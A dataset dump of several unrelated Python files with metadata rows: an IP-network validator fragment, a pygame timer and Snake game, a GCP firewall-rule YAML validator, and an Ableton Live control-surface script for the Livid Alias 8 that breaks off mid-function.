    # AddressValueError/NetmaskValueError subclass ValueError, so ValueError
    # covers them; TypeError handles invalid argument combinations.
    except (ValueError, TypeError):
        return False
def valid_ipv4_network(*args, **kwargs):
    """Return True when the given arguments describe a valid IPv4 network."""
    return valid_ip_network(*args, method=IPv4Network, **kwargs)
def valid_ipv6_network(*args, **kwargs):
    """Return True when the given arguments describe a valid IPv6 network."""
    return valid_ip_network(*args, method=IPv6Network, **kwargs)
| 902 | 0 | 138 |
63728377d479403422a92ef81174df58b96731e3 | 433 | py | Python | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | null | null | null | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | 1 | 2016-03-31T17:57:15.000Z | 2016-03-31T17:57:15.000Z | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | null | null | null | from nekumo.api.config import QuickStart
from nekumo.api.nodes import Dir, File, Node, Image, Video
__author__ = 'nekmo'
stanza_classes = [
# Este listado se recorre para determinar el tipo de clase mejor a usar
# con un nodo. Se usa un método estático is_capable para determinarlo.
# Por ejemplo, tendremos clases Dir y File, con métodos distintos.
QuickStart,
Image,
Video,
Dir,
File,
Node,
] | 25.470588 | 75 | 0.704388 | from nekumo.api.config import QuickStart
from nekumo.api.nodes import Dir, File, Node, Image, Video
__author__ = 'nekmo'
stanza_classes = [
    # This list is iterated over to determine the best class type to use
    # for a node. The static method is_capable is used to decide.
    # For example, there will be Dir and File classes with different methods.
QuickStart,
Image,
Video,
Dir,
File,
Node,
] | 0 | 0 | 0 |
cec52e737fbc12c84d80316828bc07b3c2d217d2 | 354 | py | Python | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | null | null | null | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | null | null | null | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | 1 | 2021-05-20T04:25:42.000Z | 2021-05-20T04:25:42.000Z | import time
import pygame
pygame.mixer.init()
alarm = pygame.mixer.Sound("alarm_ding.ogg")
alarm_len = alarm.get_length()
minutes = int(input ("Minutes:"))*60
seconds = int(input("Seconds:"))
timer = minutes + seconds
for i in range(timer):
print("", str(timer - i), end="\r")
time.sleep(1)
alarm.play()
print("time's over")
time.sleep(alarm_len) | 25.285714 | 44 | 0.69209 | import time
# Countdown timer: read minutes and seconds, count down once per second,
# then play an alarm sound to completion.
import pygame
pygame.mixer.init()
alarm = pygame.mixer.Sound("alarm_ding.ogg")
# Clip length in seconds, used to keep the process alive while it plays.
alarm_len = alarm.get_length()
minutes = int(input ("Minutes:"))*60
seconds = int(input("Seconds:"))
timer = minutes + seconds
for i in range(timer):
    # \r returns the cursor so each remaining-seconds value overwrites the last.
    print("", str(timer - i), end="\r")
    time.sleep(1)
alarm.play()
print("time's over")
# play() is asynchronous; sleep for the clip length so we don't exit mid-sound.
time.sleep(alarm_len)
be7462abf626e2b079537e2f1c3b0b33acf2580d | 2,886 | py | Python | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | #################################3##################################################################
# Name: Pygame Snake Experiment
# Purpose: Make a simple pygame game to get a handle on PyGame
# Date: 2013/12/22
# Programmer: Toben "Littlefoo" "Narcolapser" Archer
# Version: 0.1
####################################################################################################
import sys, pygame
from pygame.locals import *
from random import randint
import math
# NOTE(review): this copy of the script was truncated by the dataset
# extraction -- the helper functions it calls below (newApple, drawApple,
# drawSnake, moveSnake, snakeCollides*) are missing here, so this copy
# cannot run as-is. See the full copy later in the dump.
pygame.init()
fps = pygame.time.Clock()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption('SNAAAAAAAAAAAAAAAAAAAAAAKE!!!!!!!!!!!!!!')
snakeLength = 3
snakeBody = [(320,240),(320,250),(320,260)]
apple = newApple()
speed = 10
direction = (0,-1)
#(1, = left, (-1, = right, 1) = down, -1) = up
quit = False
# Main loop: WASD steers, 'q' quits; eating an apple grows the snake and
# raises the frame rate, which acts as the game speed.
while not quit:
	events = pygame.event.get()
	window.fill((0,0,128))
	for event in events:
		if event.type == KEYDOWN:
			if event.key == K_q:
				quit = True
			if event.key == K_a:
				direction = (-1,0)
			if event.key == K_d:
				direction = (1,0)
			if event.key == K_w:
				direction = (0,-1)
			if event.key == K_s:
				direction = (0,1)
	appleEaten = snakeCollidesApple(snakeBody,apple)
	snakeBitten = snakeCollidesSelf(snakeBody)
	snakeCrashed = snakeCollidesEdge(snakeBody)
	if appleEaten:
		apple = newApple()
		snakeLength += 1
		speed += 1
	snakeBody = moveSnake(snakeBody)
	drawApple()
	drawSnake()
	pygame.display.update()
	fps.tick(speed)
	quit = snakeBitten or snakeCrashed or quit
# Python 2 print statements -- this script predates Python 3.
print "you ate:",snakeLength-3,"apples!"
if randint(0,100)>95:
	print "big question here: do snakes eat apples?"
| 23.088 | 100 | 0.618503 | #################################3##################################################################
# Name: Pygame Snake Experiement
# Purpose: Make a simple pygame game to get a handle on PyGame
# Date: 2013/12/22
# Programmer: Toben "Littlefoo" "Narcolapser" Archer
# Version: 0.1
####################################################################################################
import sys, pygame
from pygame.locals import *
from random import randint
import math
def drawApple():
	"""Draw the apple as a 5-px red circle onto the global window.

	Fix: removed the unused local ``green`` that the original created
	but never used.
	"""
	red = pygame.Color(255,0,0)
	pygame.draw.circle(window,red,apple,5,0)
def newApple():
	"""Pick a new apple position, re-rolling while it lands within 20 px
	of the snake's head on either axis.

	NOTE(review): the initial roll (randint over 5..635 / 5..475) is not
	snapped to the 10-px movement grid, but the re-roll branch produces
	grid-aligned values (n*10+5). The 7-px collision tolerance in
	snakeCollidesApple makes both reachable, but the inconsistency looks
	unintentional -- confirm before changing.
	"""
	x = randint(5,635)
	y = randint(5,475)
	while abs(snakeBody[0][0]-x)<20:
		x = randint(1,63)
		x *= 10
		x += 5
	while abs(snakeBody[0][1]-y)<20:
		y = randint(1,47)
		y *= 10
		y += 5
	return (x,y)
def drawSnake():
	"""Render every snake segment as a 5-px green circle on the global window."""
	body_color = pygame.Color(0,255,0)
	for segment in snakeBody:
		pygame.draw.circle(window, body_color, segment, 5, 0)
def moveSnake(snakeBody):
	"""Advance the snake one 10-px step along the global `direction`.

	Prepends the new head position and trims the tail back down to the
	global `snakeLength`, returning the new body list.
	"""
	hx, hy = snakeBody[0][0], snakeBody[0][1]
	new_head = (hx + 10 * direction[0], hy + 10 * direction[1])
	return ([new_head] + snakeBody)[:snakeLength]
def snakeCollidesApple(snakeBody,apple):
	"""Return True when any snake segment overlaps the apple.

	Overlap means the segment centre is within 7 px of the apple centre
	on both axes.
	"""
	ax, ay = apple[0], apple[1]
	return any(abs(seg[0] - ax) <= 7 and abs(seg[1] - ay) <= 7 for seg in snakeBody)
def snakeCollidesSelf(snakeBody):
	"""Return True when the head overlaps any other body segment.

	Overlap means the squared centre distance is below 25 (i.e. the two
	5-px-radius circles intersect).
	"""
	hx, hy = snakeBody[0][0], snakeBody[0][1]
	for seg in snakeBody[1:]:
		dx = seg[0] - hx
		dy = seg[1] - hy
		if dx * dx + dy * dy < 25:
			return True
	return False
def snakeCollidesEdge(snakeBody):
	"""Return True when the snake's head has left the 640x480 window.

	Positions exactly on the 0/640/480 boundary still count as inside,
	matching the original strict comparisons.
	"""
	hx, hy = snakeBody[0][0], snakeBody[0][1]
	return not (0 <= hx <= 640 and 0 <= hy <= 480)
pygame.init()
fps = pygame.time.Clock()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption('SNAAAAAAAAAAAAAAAAAAAAAAKE!!!!!!!!!!!!!!')
# Initial snake: three 10-px segments heading up from the window centre.
snakeLength = 3
snakeBody = [(320,240),(320,250),(320,260)]
apple = newApple()
speed = 10
direction = (0,-1)
#(1, = left, (-1, = right, 1) = down, -1) = up
quit = False
# Main game loop: WASD steers, 'q' quits. Eating an apple grows the snake
# by one segment and raises the frame rate, which acts as the game speed.
# Biting yourself or leaving the window ends the game.
while not quit:
	events = pygame.event.get()
	window.fill((0,0,128))
	for event in events:
		if event.type == KEYDOWN:
			if event.key == K_q:
				quit = True
			if event.key == K_a:
				direction = (-1,0)
			if event.key == K_d:
				direction = (1,0)
			if event.key == K_w:
				direction = (0,-1)
			if event.key == K_s:
				direction = (0,1)
	appleEaten = snakeCollidesApple(snakeBody,apple)
	snakeBitten = snakeCollidesSelf(snakeBody)
	snakeCrashed = snakeCollidesEdge(snakeBody)
	if appleEaten:
		apple = newApple()
		snakeLength += 1
		speed += 1
	snakeBody = moveSnake(snakeBody)
	drawApple()
	drawSnake()
	pygame.display.update()
	fps.tick(speed)
	quit = snakeBitten or snakeCrashed or quit
# Python 2 print statements -- this script predates Python 3.
print "you ate:",snakeLength-3,"apples!"
if randint(0,100)>95:
	print "big question here: do snakes eat apples?"
| 1,101 | 0 | 161 |
0daa40e3ec7edb96b0896e8da663755d0a55eed0 | 7,692 | py | Python | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 84 | 2022-01-12T21:25:12.000Z | 2022-03-31T05:40:02.000Z | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 77 | 2022-01-12T18:49:05.000Z | 2022-03-29T13:05:17.000Z | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 55 | 2022-01-15T13:47:30.000Z | 2022-03-31T17:35:48.000Z | #!/usr/bin/env python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import ipaddress
import json
import sys
import click
import yaml
import yamale
from fnmatch import fnmatch
from types import SimpleNamespace
from yamale.validators import DefaultValidators, Validator
# NOTE(review): the method bodies of the four validator classes below were
# stripped by the dataset extraction; only their class-level attributes
# remain. See the complete definitions later in the dump.
class Netmask(Validator):
    """ Custom netmask validator """
    tag = 'netmask'
    settings = {}
    mode = None
    _type = None
class NetworkTag(Validator):
    """ Custom network tag validator """
    tag = 'networktag'
    settings = {}
    mode = None
    _type = None
class ServiceAccount(Validator):
    """ Custom service account validator """
    tag = 'serviceaccount'
    settings = {}
    mode = None
    _type = None
class NetworkPorts(Validator):
    """ Custom ports validator """
    tag = 'networkports'
    settings = {}
    mode = None
    _type = None
    allowed_port_map = []
    approved_port_map = []
@click.command()
@click.argument('files')
@click.option('--schema',
              default='/schemas/firewallSchema.yaml',
              help='YAML schema file')
@click.option('--settings',
              default='/schemas/firewallSchemaSettings.yaml',
              help='schema configuration file')
@click.option('--mode',
              default='validate',
              help='select mode (validate or approve)')
@click.option('--github',
              is_flag=True,
              default=False,
              help='output GitHub action compatible variables')
# NOTE(review): the decorated `main` function was removed by the dataset
# extraction, leaving the click decorators above dangling -- this copy is
# syntactically invalid. The full definition appears later in the dump.
if __name__ == '__main__':
    main()
| 29.247148 | 77 | 0.656526 | #!/usr/bin/env python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import ipaddress
import json
import sys
import click
import yaml
import yamale
from fnmatch import fnmatch
from types import SimpleNamespace
from yamale.validators import DefaultValidators, Validator
class Netmask(Validator):
    """ Custom netmask validator """
    # Shared configuration injected onto the class by FirewallValidator
    # before any validation runs.
    tag = 'netmask'
    settings = {}
    mode = None
    _type = None
    def __init__(self, *args, **kwargs):
        # 'type' narrows which configured ranges apply:
        # 'source', 'destination', or the default 'source-or-dest'.
        self._type = kwargs.pop('type', 'source-or-dest')
        super().__init__(*args, **kwargs)
    def fail(self, value):
        """Build the failure message shown when a CIDR is rejected."""
        dir_str = 'source or destination'
        mode_str = 'allowed'
        if self._type == 'source':
            dir_str = 'source'
        elif self._type == 'destination':
            dir_str = 'destination'
        if self.mode == 'approve':
            mode_str = 'automatically approved'
        return '\'%s\' is not an %s %s network.' % (value, mode_str, dir_str)
    def _is_valid(self, value):
        """True when the CIDR is a subnet of a configured allowed range.

        In 'approve' mode the matching range must also be flagged approved.
        NOTE(review): ipaddress.ip_network() raises ValueError on malformed
        input (e.g. host bits set), so bad input surfaces as an exception
        rather than a clean validation failure -- confirm that is intended.
        """
        is_ok = False
        network = ipaddress.ip_network(value)
        if self._type == 'source' or self._type == 'source-or-dest':
            for ip_range in self.settings['allowedSourceRanges']:
                allowed_network = ipaddress.ip_network(ip_range['cidr'])
                if network.subnet_of(allowed_network):
                    if self.mode != 'approve' or ip_range['approved']:
                        is_ok = True
                        break
        if self._type == 'destination' or self._type == 'source-or-dest':
            for ip_range in self.settings['allowedDestinationRanges']:
                allowed_network = ipaddress.ip_network(ip_range['cidr'])
                if network.subnet_of(allowed_network):
                    if self.mode != 'approve' or ip_range['approved']:
                        is_ok = True
                        break
        return is_ok
class NetworkTag(Validator):
    """ Custom network tag validator """
    tag = 'networktag'
    settings = {}
    mode = None
    _type = None
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
    def fail(self, value):
        """Failure message shown when a network tag is rejected."""
        mode_str = 'automatically approved' if self.mode == 'approve' else 'allowed'
        return '\'%s\' is not an %s network tag.' % (value, mode_str)
    def _is_valid(self, value):
        """A tag is valid when it matches a configured glob pattern (and,
        in approve mode, that pattern is flagged approved)."""
        approve_mode = self.mode == 'approve'
        return any(
            fnmatch(value, entry['tag']) and (not approve_mode or entry['approved'])
            for entry in self.settings['allowedNetworkTags']
        )
class ServiceAccount(Validator):
    """ Custom service account validator """
    tag = 'serviceaccount'
    settings = {}
    mode = None
    _type = None
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
    def fail(self, value):
        """Failure message shown when a service account is rejected."""
        mode_str = 'automatically approved' if self.mode == 'approve' else 'allowed'
        return '\'%s\' is not an %s service account.' % (value, mode_str)
    def _is_valid(self, value):
        """Valid when the value matches a configured glob pattern (and, in
        approve mode, that pattern is flagged approved)."""
        approve_mode = self.mode == 'approve'
        return any(
            fnmatch(value, entry['serviceAccount']) and (not approve_mode or entry['approved'])
            for entry in self.settings['allowedServiceAccounts']
        )
class NetworkPorts(Validator):
    """ Custom ports validator """
    tag = 'networkports'
    settings = {}
    mode = None
    _type = None
    # Kept for interface compatibility; instances shadow these with fresh
    # per-instance lists in __init__ (see bug-fix note there).
    allowed_port_map = []
    approved_port_map = []
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Bug fix: the original extended the *class-level* lists, so every
        # instantiation appended the whole configured port map again and all
        # instances shared (and duplicated) the same state. Bind fresh
        # instance-level lists before populating them.
        self.allowed_port_map = []
        self.approved_port_map = []
        for port in self.settings['allowedPorts']:
            ports = self._process_port_definition(port['ports'])
            self.allowed_port_map.extend(ports)
            if port['approved']:
                self.approved_port_map.extend(ports)
    def _process_port_definition(self, port_definition):
        """Expand a port spec (int, 'N', or 'A-B' range) into a list of ints."""
        ports = []
        if not isinstance(port_definition, int) and '-' in port_definition:
            start, end = port_definition.split('-', 2)
            for port in range(int(start), int(end) + 1):
                ports.append(int(port))
        else:
            ports.append(int(port_definition))
        return ports
    def fail(self, value):
        """Failure message shown when a port (or port range) is rejected."""
        mode_str = 'allowed'
        if self.mode == 'approve':
            mode_str = 'automatically approved'
        return '\'%s\' is not an %s IP port.' % (value, mode_str)
    def _is_valid(self, value):
        """Every port covered by the (possibly ranged) value must appear in
        the active map: approved_port_map in approve mode, else
        allowed_port_map."""
        ports = self._process_port_definition(value)
        is_ok = True
        for port in ports:
            if self.mode == 'approve' and port not in self.approved_port_map:
                is_ok = False
                break
            elif port not in self.allowed_port_map:
                is_ok = False
                break
        return is_ok
class FirewallValidator:
    """Wires the custom validators into a yamale schema and validates files."""
    schema = None
    settings = None
    validators = None
    def __init__(self, settings, mode):
        self.settings = settings
        self.validators = DefaultValidators.copy()
        # Inject the shared configuration into each custom validator class,
        # then register it under its schema tag.
        for validator_cls in (Netmask, NetworkTag, ServiceAccount, NetworkPorts):
            validator_cls.settings = self.settings
            validator_cls.mode = mode
            self.validators[validator_cls.tag] = validator_cls
    def set_schema_from_file(self, schema):
        """Load the validation schema from a YAML file on disk."""
        self.schema = yamale.make_schema(path=schema, validators=self.validators)
    def set_schema_from_string(self, schema):
        """Load the validation schema from an in-memory YAML string."""
        self.schema = yamale.make_schema(
            content=schema, validators=self.validators)
    def validate_file(self, file):
        """Validate one YAML file; raises yamale's YamaleError on failure."""
        print('Validating %s...' % (file), file=sys.stderr)
        data = yamale.make_data(file)
        yamale.validate(self.schema, data)
@click.command()
@click.argument('files')
@click.option('--schema',
              default='/schemas/firewallSchema.yaml',
              help='YAML schema file')
@click.option('--settings',
              default='/schemas/firewallSchemaSettings.yaml',
              help='schema configuration file')
@click.option('--mode',
              default='validate',
              help='select mode (validate or approve)')
@click.option('--github',
              is_flag=True,
              default=False,
              help='output GitHub action compatible variables')
def main(**kwargs):
    """Validate firewall rule YAML files against the schema.

    FILES may be a single path or a glob pattern; results are emitted as a
    JSON object ({'ok': bool, 'errors': {file: [messages]}}) on stdout, or
    as GitHub Actions output variables when --github is set. Exits non-zero
    on validation failure (unless --github, where the workflow reads the
    'ok' output instead).
    """
    args = SimpleNamespace(**kwargs)
    files = [args.files]
    if '*' in args.files:
        files = glob.glob(args.files, recursive=True)
    print('Arguments: %s' % (str(sys.argv)), file=sys.stderr)
    # Fix: close the settings file deterministically instead of leaking the
    # handle (the original never closed it).
    with open(args.settings) as f:
        settings = yaml.load(f, Loader=yaml.SafeLoader)
    firewall_validator = FirewallValidator(settings, args.mode)
    firewall_validator.set_schema_from_file(args.schema)
    output = {'ok': True, 'errors': {}}
    for file in files:
        try:
            firewall_validator.validate_file(file)
        except yamale.yamale_error.YamaleError as e:
            # Collect every error for this file; keep validating the rest.
            if file not in output['errors']:
                output['errors'][file] = []
            output['ok'] = False
            for result in e.results:
                for err in result.errors:
                    output['errors'][file].append(err)
    if args.github:
        print('::set-output name=ok::%s' % ('true' if output['ok'] else 'false'))
        print('::set-output name=errors::%s' % (json.dumps(output['errors'])))
        print(json.dumps(output), file=sys.stderr)
    else:
        print(json.dumps(output))
    if not output['ok'] and not args.github:
        sys.exit(1)
if __name__ == '__main__':
    main()
| 5,158 | 157 | 370 |
01cf7eb68c103c544c2212f518a5b1cea3c6bd46 | 10,355 | py | Python | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | 25 | 2015-02-02T21:41:51.000Z | 2022-02-19T13:08:53.000Z | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | null | null | null | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | 13 | 2015-10-25T04:44:09.000Z | 2020-03-01T18:02:27.000Z | # amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import DeprecatedSessionZoomingComponent as SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from VCM600.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from VCM600.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.M4LInterfaceComponent import M4LInterfaceComponent
"""Custom files, overrides, and files from other scripts"""
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.Debug import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
""" Here we add an override to the MixerComponent to include return channels in our mixer """
# a | 39.67433 | 182 | 0.764558 | # amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import DeprecatedSessionZoomingComponent as SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from VCM600.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from VCM600.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.M4LInterfaceComponent import M4LInterfaceComponent
"""Custom files, overrides, and files from other scripts"""
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.Debug import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
""" Here we add an override to the MixerComponent to include return channels in our mixer """
class AliasMixerComponent(MixerComponent):
	"""MixerComponent variant whose strip assignment also spans return tracks."""
	def tracks_to_use(self):
		song = self.song()
		return tuple(song.visible_tracks) + tuple(song.return_tracks)
class Alias(ControlSurface):
	__module__ = __name__
	__doc__ = " Alias 8 controller script "
	def __init__(self, c_instance):
		super(Alias, self).__init__(c_instance)
		with self.component_guard():
			self._host_name = 'Alias'
			self._color_type = 'OhmRGB'
			self.log_message("--------------= Alias log opened =--------------")
			self._rgb = 0
			self._timer = 0
			self.flash_status = 1
			self._clutch_device_selection = False
			self._touched = 0
			self._update_linked_device_selection = None
			self._setup_monobridge()
			self._setup_controls()
			self._setup_m4l_interface()
			self._setup_mixer_control()
			self._setup_session_control()
			self._setup_mixer_nav()
	"""script initialization methods"""
	# Bridge element used to push LCD/touch notifications to the M4L patch.
	def _setup_monobridge(self):
		self._monobridge = MonoBridgeElement(self)
		self._monobridge.name = 'MonoBridge'
	# Hardware control wrappers: 9 faders, 16 buttons, 16 dials, 1 encoder
	# (CC/note numbers come from the Map module constants).
	def _setup_controls(self):
		is_momentary = True
		self._fader = [MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_FADERS[index], Live.MidiMap.MapMode.absolute, 'Fader_' + str(index), index, self) for index in range(9)]
		self._button = [MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, ALIAS_BUTTONS[index], 'Button_' + str(index), self) for index in range(16)]
		self._dial = [MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_DIALS[index], Live.MidiMap.MapMode.absolute, 'Dial_' + str(index), index + 8, self) for index in range(16)]
		self._encoder = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_ENCODER, Live.MidiMap.MapMode.absolute, 'Encoder', 0, self)
	# Expose control grab/release hooks to Max for Live devices.
	def _setup_m4l_interface(self):
		self._m4l_interface = M4LInterfaceComponent(controls=self.controls, component_guard=self.component_guard)
		self.get_control_names = self._m4l_interface.get_control_names
		self.get_control = self._m4l_interface.get_control
		self.grab_control = self._m4l_interface.grab_control
		self.release_control = self._m4l_interface.release_control
	# Map faders/dials/buttons onto an 8-strip mixer plus master fader:
	# row 1 buttons = mute, row 2 buttons = arm, dials = two send banks.
	def _setup_mixer_control(self):
		is_momentary = True
		self._num_tracks = (8) #A mixer is one-dimensional;
		self._mixer = AliasMixerComponent(8, 0, False, False)
		self._mixer.name = 'Mixer'
		self._mixer.set_track_offset(0) #Sets start point for mixer strip (offset from left)
		for index in range(8):
			self._mixer.channel_strip(index).set_volume_control(self._fader[index])
			self._mixer.channel_strip(index).set_send_controls(tuple([self._dial[index], self._dial[index+8]]))
			self._mixer.channel_strip(index).set_mute_button(self._button[index])
			self._button[index].set_on_off_values(MUTE_TOG, 0)
			self._mixer.channel_strip(index)._invert_mute_feedback = True
			self._mixer.channel_strip(index).set_arm_button(self._button[index+8])
			self._button[index+8].set_on_off_values(REC_TOG, 0)
			self._mixer.channel_strip(index).name = 'Mixer_ChannelStrip_' + str(index)
		self._mixer.master_strip().set_volume_control(self._fader[8])
		self.song().view.selected_track = self._mixer.channel_strip(0)._track
	def _setup_session_control(self):
		self._session = SessionComponent(8, 1)
		self._session.set_mixer(self._mixer)
		self.set_highlighting_session_component(self._session)
	# The encoder scrolls the session/mixer track offset (see _nav_change).
	def _setup_mixer_nav(self):
		if not self._encoder.value_has_listener(self._nav_change):
			self._encoder.add_value_listener(self._nav_change)
	"""shift/zoom methods"""
	# Scale the encoder's 0..127 value onto the available track-offset range.
	def _nav_change(self, value):
		self._session.set_offsets(int((float(value)/float(127))*max(8, len(self._mixer.tracks_to_use())-8)), self._session._scene_offset)
	"""called on timer"""
	def update_display(self):
		ControlSurface.update_display(self)
		self._timer = (self._timer + 1) % 256
		self.flash()
	# Drive LED flashing on all buttons from the shared 0..255 timer phase.
	def flash(self):
		if(self.flash_status > 0):
			for control in self.controls:
				if isinstance(control, MonoButtonElement):
					control.flash(self._timer)
	"""m4l bridge"""
	# Squeeze a name/value into a fixed 12-character LCD field: trims 'dB'
	# suffixes, drops spaces/vowels from overlong strings, centres short
	# ones, replaces non-ASCII with spaces, and maps spaces to underscores.
	def generate_strip_string(self, display_string):
		NUM_CHARS_PER_DISPLAY_STRIP = 12
